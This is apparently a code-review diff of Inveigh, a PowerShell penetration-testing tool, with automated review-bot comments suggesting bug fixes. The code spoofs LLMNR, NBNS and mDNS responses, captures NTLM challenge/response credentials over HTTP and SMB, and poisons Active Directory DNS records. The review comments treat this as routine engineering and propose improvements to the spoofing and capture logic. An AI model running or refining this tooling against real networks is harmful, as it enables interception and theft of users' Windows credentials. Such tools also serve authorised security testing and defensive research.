- 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
- 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
- 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
- 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
- 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
- 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
- 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $target_length +
+ $target_length +
+ $target_offset +
+ 0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f +
+ $netBIOS_domain_bytes +
+ 0x02,0x00 +
+ $netBIOS_domain_length +
+ $netBIOS_domain_bytes +
+ 0x01,0x00 +
+ $hostname_length +
+ $hostname_bytes +
+ 0x04,0x00 +
+ $DNS_domain_length +
+ $DNS_domain_bytes +
+ 0x03,0x00 +
+ $DNS_hostname_length +
+ $DNS_hostname_bytes +
+ 0x05,0x00 +
+ $DNS_domain_length +
+ $DNS_domain_bytes +
+ 0x07,0x00,0x08,0x00 +
$HTTP_timestamp +
0x00,0x00,0x00,0x00,0x0a,0x0a
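Review bot: The AV_PAIR list that replaces the hard-coded LAB/HOSTNAME bytes carries no comments naming the fields, and the `+ 36` and the doubled `$DNS_domain_bytes.Length` in `$target_length` (L3439) read like typos even though they are correct. Add a comment above L3439 such as `# TargetInfo length: five 4-byte AV_PAIR headers + 12-byte MsvAvTimestamp + 4-byte MsvAvEOL = 36; the DNS domain is emitted twice (MsvAvDnsDomainName and MsvAvDnsTreeName)`, and label each pair in the byte list (`# 0x0002 MsvAvNbDomainName`, `# 0x0001 MsvAvNbComputerName`, `# 0x0004 MsvAvDnsDomainName`, `# 0x0003 MsvAvDnsComputerName`, `# 0x0005 MsvAvDnsTreeName`, `# 0x0007 MsvAvTimestamp`) so the layout can be checked against MS-NLMP without recounting. `[System.Text.Encoding]::Unicode.GetBytes` throws on a `$null` argument, so `$inveigh.computer_name`, `netBIOS_domain`, `DNS_domain` and `DNS_computer_name` must be populated before the listener accepts a connection — presumably done at startup, which is not visible here.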
@@ -1966,10 +2933,10 @@ $HTTP_scriptblock =
}
elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
{
- $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes
- $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
- $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
- $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
+ $HTTP_NTLM_length = Get-UInt16DataLength 20 $HTTP_request_bytes
+ $HTTP_NTLM_offset = Get-UInt32DataLength 24 $HTTP_request_bytes
+ $HTTP_NTLM_domain_length = Get-UInt16DataLength 28 $HTTP_request_bytes
+ $HTTP_NTLM_domain_offset = Get-UInt32DataLength 32 $HTTP_request_bytes
[String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*'
$inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
$NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
@@ -1980,15 +2947,15 @@ $HTTP_scriptblock =
}
else
{
- $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes
+ $HTTP_NTLM_domain_string = Convert-DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes
}
- $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes
- $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes
- $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
- $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes
- $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes
- $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
+ $HTTP_NTLM_user_length = Get-UInt16DataLength 36 $HTTP_request_bytes
+ $HTTP_NTLM_user_offset = Get-UInt32DataLength 40 $HTTP_request_bytes
+ $HTTP_NTLM_user_string = Convert-DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
+ $HTTP_NTLM_host_length = Get-UInt16DataLength 44 $HTTP_request_bytes
+ $HTTP_NTLM_host_offset = Get-UInt32DataLength 48 $HTTP_request_bytes
+ $HTTP_NTLM_host_string = Convert-DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
$HTTP_username_full = $HTTP_NTLM_domain_string + "\" + $HTTP_NTLM_user_string
if($HTTP_NTLM_length -eq 24) # NTLMv1
@@ -2058,6 +3025,11 @@ $HTTP_scriptblock =
}
+ if($HTTP_NTLM_domain_string -and $HTTP_NTLM_user_string -and $HTTP_NTLM_host_string -and $HTTP_source_IP)
+ {
+ Invoke-SessionUpdate $HTTP_NTLM_domain_string $HTTP_NTLM_user_string $HTTP_NTLM_host_string $HTTP_source_IP
+ }
+
if ($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $HTTP_source_IP -ne $IP)
{
$inveigh.IP_capture_list.Add($HTTP_source_IP) > $null
@@ -2269,10 +3241,10 @@ $HTTP_scriptblock =
# Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer
$sniffer_scriptblock =
{
- param ($DNSHostsIgnore,$DNSThreshold,$DNSTTL,$Evade,$IP,$LLMNR,$LLMNR_response_message,$LLMNRTTL,$mDNS,
- $mDNS_response_message,$mDNSTypes,$mDNSTTL,$NBNS,$NBNS_response_message,$NBNSTypes,$NBNSTTL,$SMB,
- $SpooferHostsIgnore,$SpooferHostsReply,$SpooferIP,$SpooferIPsIgnore,$SpooferIPsReply,
- $SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval)
+ param ($Evade,$IP,$LLMNR,$LLMNR_response_message,$LLMNRTTL,$mDNS,$mDNS_response_message,$mDNSTypes,$mDNSTTL,
+ $NBNS,$NBNS_response_message,$NBNSTypes,$NBNSTTL,$SMB,$SpooferHostsIgnore,$SpooferHostsReply,
+ $SpooferIP,$SpooferIPsIgnore,$SpooferIPsReply,$SpooferLearning,$SpooferLearningDelay,
+ $SpooferLearningInterval)
$sniffer_running = $true
$byte_in = New-Object System.Byte[] 4
@@ -2320,7 +3292,7 @@ $sniffer_scriptblock =
$binary_reader = New-Object System.IO.BinaryReader($memory_stream)
$version_HL = $binary_reader.ReadByte()
$binary_reader.ReadByte() > $null
- $total_length = DataToUInt16 $binary_reader.ReadBytes(2)
+ $total_length = Convert-DataToUInt16 $binary_reader.ReadBytes(2)
$binary_reader.ReadBytes(5) > $null
$protocol_number = $binary_reader.ReadByte()
$binary_reader.ReadBytes(2) > $null
@@ -2335,8 +3307,8 @@ $sniffer_scriptblock =
6
{ # TCP
- $source_port = DataToUInt16 $binary_reader.ReadBytes(2)
- $destination_port = DataToUInt16 $binary_reader.ReadBytes(2)
+ $source_port = Convert-DataToUInt16 $binary_reader.ReadBytes(2)
+ $destination_port = Convert-DataToUInt16 $binary_reader.ReadBytes(2)
$binary_reader.ReadBytes(8) > $null
$TCP_header_length = [Int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4
$binary_reader.ReadBytes(7) > $null
@@ -2349,16 +3321,13 @@ $sniffer_scriptblock =
{
if($SMB -eq 'Y')
{
+ Get-SMBConnection $payload_bytes "$source_IP`:$source_port" "139"
- if($NTLM_challenge -and $client_IP -eq $source_IP -and $client_port -eq $source_port)
+ if($inveigh.SMB_session_table."$source_IP`:$source_port")
{
- SMBNTLMResponse $payload_bytes
+ Get-SMBNTLMResponse $payload_bytes "$source_IP`:$source_port"
}
- $client_IP = ""
- $client_port = ""
- $NTLM_challenge = ""
-
}
}
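Review bot: Entries in `$inveigh.SMB_session_table` are keyed by the client's `"$source_IP`:$source_port"` and, as far as this chunk shows, are only added (L3603, L3619) and read (L3566, L3409), never removed, whereas the code this replaces cleared `$client_IP`/`$client_port`/`$NTLM_challenge` after every response. Over a long capture the table grows with each SMB session, and an ephemeral port reused by the same client matches a stale challenge until a new NEGOTIATE overwrites it. Unless Get-SMBNTLMResponse drops the entry itself (its visible part at L3383-L3410 does not), remove it once the response has been parsed, e.g. `$inveigh.SMB_session_table.Remove("$source_IP`:$source_port")` after the Get-SMBNTLMResponse call here and in the 445 branch at L3580-L3586, assuming the table is a hashtable as the property-style access suggests.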
@@ -2367,16 +3336,13 @@ $sniffer_scriptblock =
if($SMB -eq 'Y')
{
+ Get-SMBConnection $payload_bytes "$source_IP`:$source_port" "445"
- if($NTLM_challenge -and $client_IP -eq $source_IP -and $client_port -eq $source_port)
+ if($inveigh.SMB_session_table."$source_IP`:$source_port")
{
- SMBNTLMResponse $payload_bytes
+ Get-SMBNTLMResponse $payload_bytes "$source_IP`:$source_port"
}
- $client_IP = ""
- $client_port = ""
- $NTLM_challenge = ""
-
}
}
@@ -2392,9 +3358,14 @@ $sniffer_scriptblock =
if($SMB -eq 'Y')
{
- $client_IP = $destination_IP
- $client_port = $destination_port
- $NTLM_challenge = SMBNTLMChallenge $payload_bytes
+ $NTLM_challenge = Get-SMBNTLMChallenge $payload_bytes
+
+ if($NTLM_challenge)
+ {
+ $inveigh.SMB_session_table."$destination_IP`:$destination_port" = $NTLM_challenge
+ $NTLM_challenge = ""
+ }
+
}
}
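Review bot: The 445 counterpart at L3617 adds `-and $destination_IP -ne $source_IP` before storing the challenge, but this branch (L3601) stores it for any destination, including traffic where the sniffer host talks to itself; if that guard is intentional it should apply to both, `if($NTLM_challenge -and $destination_IP -ne $source_IP)`. The two branches are otherwise identical, so a small shared helper would stop them drifting apart again. Which branch is 139 and which is 445 is inferred from the ordering of the earlier branches at L3564 and L3580.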
@@ -2404,9 +3375,14 @@ $sniffer_scriptblock =
if($SMB -eq 'Y')
{
- $client_IP = $destination_IP
- $client_port = $destination_port
- $NTLM_challenge = SMBNTLMChallenge $payload_bytes
+ $NTLM_challenge = Get-SMBNTLMChallenge $payload_bytes
+
+ if($NTLM_challenge -and $destination_IP -ne $source_IP)
+ {
+ $inveigh.SMB_session_table."$destination_IP`:$destination_port" = $NTLM_challenge
+ $NTLM_challenge = ""
+ }
+
}
}
@@ -2418,10 +3394,10 @@ $sniffer_scriptblock =
17
{ # UDP
$source_port = $binary_reader.ReadBytes(2)
- $endpoint_source_port = DataToUInt16 ($source_port)
- $destination_port = DataToUInt16 $binary_reader.ReadBytes(2)
+ $endpoint_source_port = Convert-DataToUInt16 ($source_port)
+ $destination_port = Convert-DataToUInt16 $binary_reader.ReadBytes(2)
$UDP_length = $binary_reader.ReadBytes(2)
- $UDP_length_uint = DataToUInt16 ($UDP_length)
+ $UDP_length_uint = Convert-DataToUInt16 ($UDP_length)
$binary_reader.ReadBytes(2) > $null
$payload_bytes = $binary_reader.ReadBytes(($UDP_length_uint - 2) * 4)
@@ -2573,7 +3549,7 @@ $sniffer_scriptblock =
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (
!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($NBNS_query_string.Trim() -ne '*') -and (
$SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)) -and ($source_IP -ne $IP) -and (
- $NBNSTypes -contains $NBNS_query_type) -and $destination_IP.IPAddressToString -ne $IP)
+ $NBNSTypes -contains $NBNS_query_type) -and ($Evade -and $destination_IP.IPAddressToString -ne $IP))
{
if($SpooferLearning -eq 'N' -or !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
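Review bot: Changing the final clause to `($Evade -and $destination_IP.IPAddressToString -ne $IP)` makes `$Evade` gate every NBNS response rather than only the self-addressed case, and the same edit is made to the LLMNR condition at L3737. If `$Evade` is a 'Y'/'N' string, both values are truthy, so the new clause behaves exactly like the old one and evasion can never be switched off; if it is a boolean or switch, an unset `$Evade` suppresses all spoofed responses. The form that says "skip self-addressed requests only in evade mode" is `($Evade -ne 'Y' -or $destination_IP.IPAddressToString -ne $IP)` for a Y/N string or `(!$Evade -or $destination_IP.IPAddressToString -ne $IP)` for a boolean; the parameter's type is not visible in this chunk, so confirm which applies.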
@@ -2583,19 +3559,7 @@ $sniffer_scriptblock =
$NBNS_destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port)
$NBNS_send_socket.SendTo($NBNS_response_packet,$NBNS_destination_point)
$NBNS_send_socket.Close()
- $NBNS_response_message = "[spoofed response sent]"
-
- if($inveigh.requested_host_IP_list -NotContains "$source_IP $NBNS_query_string")
- {
- $inveigh.requested_host_IP_list.Add("$source_IP $NBNS_query_string") > $null
- $inveigh.requested_host_list.Add($NBNS_query_string.ToLower()) > $null
- }
-
- if($inveigh.DNS)
- {
- DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
- }
-
+ $NBNS_response_message = "[Response Sent]"
}
else
{
@@ -2621,6 +3585,28 @@ $sniffer_scriptblock =
if(!$NBNS_request_ignore -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00')
{
$inveigh.output_queue.Add("$NBNS_response_type [$(Get-Date -format s)] NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") > $null
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+
+ if(!$inveigh.request_table.ContainsKey($NBNS_query_string))
+ {
+ $inveigh.request_table.Add($NBNS_query_string.ToLower(),[Array]$source_IP.IPAddressToString)
+ $inveigh.request_table_updated = $true
+ }
+ else
+ {
+
+ if($inveigh.request_table.$NBNS_query_string -NotContains $source_IP.IPAddressToString)
+ {
+ $inveigh.request_table.$NBNS_query_string += $source_IP.IPAddressToString
+ $inveigh.request_table_updated = $true
+ }
+
+ }
+
+ }
+
}
elseif($SpooferLearning -eq 'Y' -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01' -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
{
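Review bot: The request-table update adds with key `$NBNS_query_string.ToLower()` but tests `ContainsKey($NBNS_query_string)` and indexes `$inveigh.request_table.$NBNS_query_string` with the original case; that is only consistent if `$inveigh.request_table` is a case-insensitive hashtable (a `@{}` literal is, a `New-Object System.Collections.Hashtable` is not), which this chunk does not show. Lower-case once, `$query_key = $NBNS_query_string.ToLower()`, and use `$query_key` for all three operations. The same block is repeated verbatim for LLMNR at L3766-L3785 and in the unprivileged spoofers at L3815-L3834 and L3898-L3917; a single `Update-RequestTable $query_string $source_IP.IPAddressToString` helper in `$shared_basic_functions_scriptblock` would keep them in step. Note also that `+=` on the stored array runs in the spoofer runspaces while the control runspace hands the live table to Invoke-ADIDNSCheck (L4056), so enumeration there may throw mid-check; the catch only logs it.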
@@ -2647,7 +3633,7 @@ $sniffer_scriptblock =
{
$UDP_length[0] += 10
$mDNS_query_payload_bytes = $payload_bytes[(12)..($payload_bytes.Length - 5)]
- $mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
+ $mDNS_query_string = Convert-DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
$mDNS_query_string_full = $mDNS_query_string + ".local"
$mDNS_response_type = "[+]"
@@ -2677,7 +3663,7 @@ $sniffer_scriptblock =
$destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port)
$send_socket.SendTo($mDNS_response_packet,$destination_point)
$send_socket.Close()
- $mDNS_response_message = "[spoofed response sent]"
+ $mDNS_response_message = "[Response Sent]"
}
else
{
@@ -2694,7 +3680,7 @@ $sniffer_scriptblock =
{
$UDP_length[0] += 4
$mDNS_query_payload_bytes = $payload_bytes[12..($payload_bytes[12] + 12)]
- $mDNS_query_string = DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
+ $mDNS_query_string = Convert-DataToString 1 $mDNS_query_payload_bytes[0] $mDNS_query_payload_bytes
$mDNS_query_string_full = $mDNS_query_string + ".local"
$mDNS_response_type = "[+]"
@@ -2726,7 +3712,7 @@ $sniffer_scriptblock =
$destination_point = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.251",5353)
$send_socket.SendTo($mDNS_response_packet,$destination_point)
$send_socket.Close()
- $mDNS_response_message = "[spoofed response sent]"
+ $mDNS_response_message = "[Response Sent]"
}
else
{
@@ -2833,8 +3819,8 @@ $sniffer_scriptblock =
if(($inveigh.valid_host_list -notcontains $LLMNR_query_string -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (
!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and (
- $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)) -and
- $destination_IP.IPAddressToString -ne $IP)
+ $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)) -and (
+ $Evade -and $destination_IP.IPAddressToString -ne $IP))
{
if($SpooferLearning -eq 'N' -or !$LLMNR_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
@@ -2844,19 +3830,7 @@ $sniffer_scriptblock =
$LLMNR_destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port)
$LLMNR_send_socket.SendTo($LLMNR_response_packet,$LLMNR_destination_point)
$LLMNR_send_socket.Close()
- $LLMNR_response_message = "[spoofed response sent]"
-
- if($inveigh.requested_host_IP_list -notcontains "$source_IP $LLMNR_query_string")
- {
- $inveigh.requested_host_IP_list.Add("$source_IP $LLMNR_query_string") > $null
- $inveigh.requested_host_list.Add($LLMNR_query_string.ToLower()) > $null
- }
-
- if($inveigh.DNS)
- {
- DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
- }
-
+ $LLMNR_response_message = "[Response Sent]"
}
else
{
@@ -2876,6 +3850,28 @@ $sniffer_scriptblock =
if(!$LLMNR_request_ignore)
{
$inveigh.output_queue.Add("$LLMNR_response_type [$(Get-Date -format s)] LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") > $null
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+
+ if(!$inveigh.request_table.ContainsKey($LLMNR_query_string))
+ {
+ $inveigh.request_table.Add($LLMNR_query_string.ToLower(),[Array]$source_IP.IPAddressToString)
+ $inveigh.request_table_updated = $true
+ }
+ else
+ {
+
+ if($inveigh.request_table.$LLMNR_query_string -NotContains $source_IP.IPAddressToString)
+ {
+ $inveigh.request_table.$LLMNR_query_string += $source_IP.IPAddressToString
+ $inveigh.request_table_updated = $true
+ }
+
+ }
+
+ }
+
}
}
@@ -3000,19 +3996,7 @@ $LLMNR_spoofer_scriptblock =
$LLMNR_multicast_group = [IPAddress]"224.0.0.252"
$LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group)
$LLMNR_UDP_client.Client.ReceiveTimeout = 5000
- $LLMNR_response_message = "[spoofed response sent]"
-
- if($inveigh.requested_host_IP_list -notcontains "$source_IP $LLMNR_query_string")
- {
- $inveigh.requested_host_IP_list.Add("$source_IP $LLMNR_query_string") > $null
- $inveigh.requested_host_list.Add($LLMNR_query_string.ToLower()) > $null
- }
-
- if($inveigh.DNS)
- {
- DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
- }
-
+ $LLMNR_response_message = "[Response Sent]"
}
else
{
@@ -3022,6 +4006,28 @@ $LLMNR_spoofer_scriptblock =
if($LLMNR_request_data)
{
$inveigh.output_queue.Add("$LLMNR_response_type [$(Get-Date -format s)] LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") > $null
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+
+ if(!$inveigh.request_table.ContainsKey($LLMNR_query_string))
+ {
+ $inveigh.request_table.Add($LLMNR_query_string.ToLower(),[Array]$source_IP.IPAddressToString)
+ $inveigh.request_table_updated = $true
+ }
+ else
+ {
+
+ if($inveigh.request_table.$LLMNR_query_string -NotContains $source_IP.IPAddressToString)
+ {
+ $inveigh.request_table.$LLMNR_query_string += $source_IP.IPAddressToString
+ $inveigh.request_table_updated = $true
+ }
+
+ }
+
+ }
+
}
$LLMNR_request_data = ""
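Review bot: The new block reads `$source_IP.IPAddressToString` inside the unprivileged LLMNR spoofer scriptblock, and the NBNS spoofer does the same at L3903 and L3909, yet in the mDNS spoofer scriptblock `$source_IP` is already a string (`$source_IP = $mDNS_listener_endpoint.Address.IPAddressToString`, L3844 and L3861). If the LLMNR and NBNS spoofers assign `$source_IP` the same way (their assignments are outside this hunk), `.IPAddressToString` on a string silently yields `$null` in non-strict mode and the table fills with empty entries that never reach the threshold. Check those assignments and either use `$source_IP` directly or store an [IPAddress] in both scriptblocks.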
@@ -3082,7 +4088,7 @@ $mDNS_spoofer_scriptblock =
0x00,0x04 +
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
- $mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data
+ $mDNS_query_string = Convert-DataToString 13 $mDNS_request_data[12] $mDNS_request_data
$mDNS_query_string_full = $mDNS_query_string + ".local"
$source_IP = $mDNS_listener_endpoint.Address.IPAddressToString
$mDNS_response_type = "[+]"
@@ -3099,7 +4105,7 @@ $mDNS_spoofer_scriptblock =
$mDNS_multicast_group = [IPAddress]"224.0.0.251"
$mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
$mDNS_UDP_client.Client.ReceiveTimeout = 5000
- $mDNS_response_message = "[spoofed response sent]"
+ $mDNS_response_message = "[Response Sent]"
}
else
{
@@ -3126,7 +4132,7 @@ $mDNS_spoofer_scriptblock =
0x00,0x04 +
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
- $mDNS_query_string = DataToString 13 $mDNS_request_data[12] $mDNS_request_data
+ $mDNS_query_string = Convert-DataToString 13 $mDNS_request_data[12] $mDNS_request_data
$mDNS_query_string_full = $mDNS_query_string + ".local"
$source_IP = $mDNS_listener_endpoint.Address.IPAddressToString
$mDNS_response_type = "[+]"
@@ -3143,7 +4149,7 @@ $mDNS_spoofer_scriptblock =
$mDNS_multicast_group = [IPAddress]"224.0.0.251"
$mDNS_UDP_client.JoinMulticastGroup($mDNS_multicast_group)
$mDNS_UDP_client.Client.ReceiveTimeout = 5000
- $mDNS_response_message = "[spoofed response sent]"
+ $mDNS_response_message = "[Response Sent]"
}
else
{
@@ -3296,19 +4302,7 @@ $NBNS_spoofer_scriptblock =
$NBNS_UDP_client.Close()
$NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
$NBNS_UDP_client.Client.ReceiveTimeout = 5000
- $NBNS_response_message = "[spoofed response sent]"
-
- if($inveigh.requested_host_IP_list -NotContains "$source_IP $NBNS_query_string")
- {
- $inveigh.requested_host_IP_list.Add("$source_IP $NBNS_query_string") > $null
- $inveigh.requested_host_list.Add($NBNS_query_string.ToLower()) > $null
- }
-
- if($inveigh.DNS)
- {
- DNSCheck $SpooferIP $DNSHostsIgnore $DNSThreshold $DNSTTL
- }
-
+ $NBNS_response_message = "[Response Sent]"
}
else
{
@@ -3320,6 +4314,28 @@ $NBNS_spoofer_scriptblock =
if($NBNS_request_data)
{
$inveigh.output_queue.Add("$NBNS_response_type [$(Get-Date -format s)] NBNS request $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") > $null
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+
+ if(!$inveigh.request_table.ContainsKey($NBNS_query_string))
+ {
+ $inveigh.request_table.Add($NBNS_query_string.ToLower(),[Array]$source_IP.IPAddressToString)
+ $inveigh.request_table_updated = $true
+ }
+ else
+ {
+
+ if($inveigh.request_table.$NBNS_query_string -NotContains $source_IP.IPAddressToString)
+ {
+ $inveigh.request_table.$NBNS_query_string += $source_IP.IPAddressToString
+ $inveigh.request_table_updated = $true
+ }
+
+ }
+
+ }
+
}
$NBNS_request_data = ""
@@ -3419,9 +4435,8 @@ $NBNS_bruteforce_spoofer_scriptblock =
# Control Loop ScriptBlock
$control_scriptblock =
{
- param ($ConsoleQueueLimit,$NBNSBruteForcePause,$RunCount,$RunTime)
-
- $inveigh.control = $true
+ param ($ADIDNSCredential,$ADIDNSDomain,$ADIDNSDomainController,$ADIDNSHostsIgnore,$ADIDNSIP,$ADIDNSPartition,
+ $ADIDNSThreshold,$ADIDNSTTL,$ADIDNSZone,$ConsoleQueueLimit,$NBNSBruteForcePause,$RunCount,$RunTime)
function OutputQueueLoop
{
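Review bot: `$inveigh.control = $true` is dropped here and `$inveigh.control = $false` at L4081, with nothing visible taking over the job of signalling that the control runspace is alive. If anything else — a shutdown wait in Stop-Inveigh, for instance — still polls `$inveigh.control`, it will now see a stale or absent value; either remove the remaining consumers in the same commit or keep the flag. The new `param` order (Credential, Domain, DomainController, HostsIgnore, IP, Partition, Threshold, TTL, Zone, then the four original arguments) matches the `AddArgument` chain at L4212-L4216, so the wiring itself looks right.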
@@ -3445,10 +4460,10 @@ $control_scriptblock =
}
- function StopInveigh
+ function Stop-InveighRunspace
{
- param ([String]$exit_message)
-
+ param ([String]$Message)
+
if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
{
@@ -3472,49 +4487,77 @@ $control_scriptblock =
}
- if($inveigh.DNS_list.Count -gt 0)
+ if($inveigh.ADIDNS -eq 'Wildcard')
+ {
+
+ try
+ {
+ Disable-ADIDNSNode -Credential $ADIDNSCredential -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Node '*' -Partition $ADIDNSPartition -Zone $ADIDNSZone
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ }
+
+ }
+
+ if($inveigh.ADIDNS -eq 'Combo' -and $inveigh.DNS_table.Count -gt 0)
{
- foreach($DNS_host in $inveigh.DNS_list)
+ foreach($DNS_host in $inveigh.DNS_table.Keys)
{
- if($DNS_host.StartsWith("1,"))
+ if($inveigh.DNS_table.$DNS_host -eq 1)
{
- $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
-
- if($DNS_update -eq "[+] DNS update successful")
+ try
{
- $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) removed")
+ Disable-ADIDNSNode -Credential $ADIDNSCredential -Domain $ADIDNSDomain -DomainController $ADIDNSDomainController -Node $DNS_host -Partition $ADIDNSPartition -Zone $ADIDNSZone
+ $inveigh.DNS_table.$DNS_host = ""
}
- else
+ catch
{
- $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS host (A) record for $($DNS_host.SubString(2)) remove failed")
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] ADIDNS host (A) record for $DNS_host remove failed") > $null
}
}
}
- $inveigh.DNS_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
}
if($inveigh.relay_running)
{
Start-Sleep -S 1
- $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting due to $exit_message") > $null
+
+ if($Message)
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh Relay is exiting due to $Message") > $null
+ }
+
OutputQueueLoop
Start-Sleep -S 1
$inveigh.relay_running = $false
-
}
if($inveigh.running)
{
Start-Sleep -S 1
- $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting due to $exit_message") > $null
+
+ if($Message)
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Inveigh is exiting due to $Message") > $null
